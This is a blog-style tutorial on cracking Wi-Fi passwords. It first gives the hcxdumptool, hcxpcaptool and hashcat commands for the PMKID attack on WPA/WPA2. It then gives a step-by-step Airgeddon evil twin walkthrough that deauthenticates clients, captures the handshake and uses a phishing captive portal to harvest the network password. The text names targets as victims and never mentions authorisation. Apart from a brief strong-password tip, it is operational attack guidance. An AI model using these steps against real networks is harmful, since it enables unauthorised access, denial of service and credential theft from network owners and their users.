How to Hack Wi-Fi Password Easily Using The New Attack On WPA/WPA2:
Looking for how to hack Wi-Fi password OR Wi-Fi hacking software? Well, a security expert has revealed a new Wi-Fi hacking technique that makes it easier for hackers to crack Wi-Fi passwords of many modern routers.
Discovered by the lead developer of the famous password-cracking tool Hashcat, Jens ‘Atom’ Steube, the new Wi-Fi hack works amazingly against WPA/WPA2 wireless network protocols with PMKID (Pairwise Master Key Identifier)-based roaming features enabled.
The attack to hack the WPA/WPA2 enabled Steube to accidentally discovered Wi-Fi networks while he was analyzing the newly-launched WPA3 security standard.
This new Wi-Fi hacking technique could potentially allow attackers to recover the Pre-shared Key (PSK) passwords, helping them to hack into your Wi-Fi network and eavesdrop on Internet communications.
According to the researcher, the previously known Wi-Fi hacking techniques require attackers to wait for someone to sniff into a network and capture a full 4-way authentication handshake of that network, Whereas, the new attack no longer necessitates any user to be on the target access point to obtain credentials. Instead, it’s performed on the RSN IE (Robust Security Network Information Element) utilizing a single EAPOL (Extensible Authentication Protocol over LAN) frame after capturing it from the Wi-Fi access point.
Robust Security Network is a security protocol for establishing a secure connection over an 802.11 wireless network and has PMKID, the key required to establish a connection between an access point and a client, as one of its capabilities.
A pentester/hacker can use a tool, such as hcxdumptool (v4.2.0 or later), to request the PMKID from the targeted wireless access point and dump/download the received frame to a file.
$ ./hcxdumptool -o captured.pcapng -i wlp39s0f3u4u5 –enable_status
Using another tool called the hcxpcaptool tool, then the output file (in .pcapng file format) of the frame can be converted into a hash format accepted by Hashcat.
$ ./hcxpcaptool -z captured.16800 captured.pcapng
Use the tool called Hashcat (v4.2.0 or later) password cracking tool to get the WPA PSK (Pre-Shared Key) password, and bingo, that’s how to hack Wi-Fi password.
$ ./hashcat -m 16800 captured.16800 -w 3 -a 3 ‘?l?l?l?l?l?l?lt!’
That’s the password of the target wireless access point, cracking, which may take time depending on its complexity and length.
“At this time, we don’t know for which vendors or for which routers this method will work, but we think it’ll work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said. Since the new Wi-Fi hack only works against networks with roaming functions enabled and required hackers to brute force the password, all users are recommended to protect their Wi-Fi network with a secure password that’s difficult to crack.
This Wi-Fi hack also doesn’t work against next-generation WPA3 wireless security protocol, because the new protocol is “much harder to attack/hack because of its new and secure key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”
There is another more efficient method of WPA/WPA2 hacking know as Evil Twin Attack using a tool called Airgeddon:
To start utilizing the Airgeddon wireless attack framework, we’ll need to download Airgeddon and any programs required. The developer also recommends installing a tool called CCZE to make the output look easier to understand. You can install it simply by typing or copy and paste the command apt-get install ccze in a terminal window. Next, we will install Airgeddon, change the working directories using the cd command, and start Airgeddon with the given commands using a terminal.
3.sudo bash ./airgeddon.sh
When you see the alien spaceship in the terminal, you know you are ready to hack.
Press enter to check the different tools the Airgeddon framework relies on. If you’re missing any of the tools, you can open a new terminal and type sudo apt-get install tool, by substituting “tool” for the name of the required missing tool. If that does not work, you correctly, you can also try the sudo pip install tool.
When you have all of the dependencies, proceed to the next step by pressing return/enter. Otherwise, you may experience issues during your attack, notably if you are missing dnsspoof.
The script will check for a working internet connection so it can update itself if a new version exists. When this completes, press enter to choose the network adapter to use.
After we select our wireless adapter, we’ll proceed to the main attack menu of the script.
Press 2 to put your wireless adapter into monitor mode. Next, select 7 for the “Evil Twin attacks” menu, and you’ll see the submenu for this attack module appear.
Select the Target:
Now that we are in the attack module, select option 9 for the “Evil Twin AP attack with a captive portal.” We will need to explore for targets, so press enter, and you’ll see a new window appear that shows a list of all nearby networks. You’ll need to wait for a few seconds to populate a list of all the nearby wireless access points.
After this runs for a few seconds, exit the small window, and a list of targets will appear in the main terminal windows. You’ll see that networks with clients using them available in yellow color with an asterisk next to them. This is important since you can’t trick someone into giving you the wireless password if no one is on the network.
Select the number of that target you wish to attack, and press enter to proceed to the next screen.
Gather the Handshake:
Now, we’ll select the type of deauthentication attack we want to use to kick the user off their trusted network. I recommend the second option, “Deauth aireplay-ng attack,” different attacks will work better depending on different networks.
Press enter, and you’ll be asked if you’d like to enable the DoS pursuit mode, which permits you to follow the AP if it switches to another channel. You can choose yes (Y), or no (N) it depending on your preference, and then press enter. Finally, you’ll choose N for using an interface with internet access. We will not need to for this attack, and it will make our attack more portable not to need an internet source.
Next step, it will ask you if you want to spoof your MAC address during the attack. In this case, We chose N for “no.” it totally depends on what works best for you.
Now, if we don’t already have a 4-way handshake for this network, we’ll have to capture one. Be careful not to accidentally select Y for “Do you already have a captured Handshake file?” if you do not have a handshake. There is no given way to go back to the script without restarting it.
Since we don’t yet have a 4 -way handshake, type N for no, and press enter to start capturing.
Once the capture process has begun, a window with red text sending deauthentication packets and another window with white text will be listening for handshakes. You should wait for a while until you see “WPA Handshake:” and the BSSID (MAC) address of your targeted AP.
Once you see that you’ve finally got the handshake, you can exit the Capturing Handshake window. When airgeddon asks you if you got the handshake, you need to select Y and save the handshake file. Next, select the directory/folder for you to write the password to, and you’re ready to proceed to the final step to configure the phishing page.
Set Up the Phishing Page
In this step, before launching the attack, we need to set the language of the phishing web page. The page given by Airgeddon is pretty decent for performing out this type of attack. We’ll select 1 for English. When you have made your decision, press enter, and the attack will start with six windows opening to perform different functions of the attack at the same time.
Capture Network Credentials
With the attack, the victim should be kicked off of their original network and see our fake AP as the only seemingly familiar option. You need to be patient and pay attention to the status in the top right window. This will tell you if a device joins the network, allowing you to see if any password attempts they make when they redirect to the captive portal.
When the victim joins our network, you’ll see a flurry of activity. In the top-right corner, you can see any failed password attempts, which will be checked against the handshake file we gathered. This will continue until the target inputs the correct password. When the victim finally enters the correct password, the windows will close except for the top-right window. The fake AP will vanish, and the victim will connect back to their original wireless network.
The credentials will display in the top-right screen, and you can copy and paste the password into a file to save. Sometimes the script doesn’t save the file correctly, so make sure not to forget this step, so might not lose the password you just captured.
Leave a Reply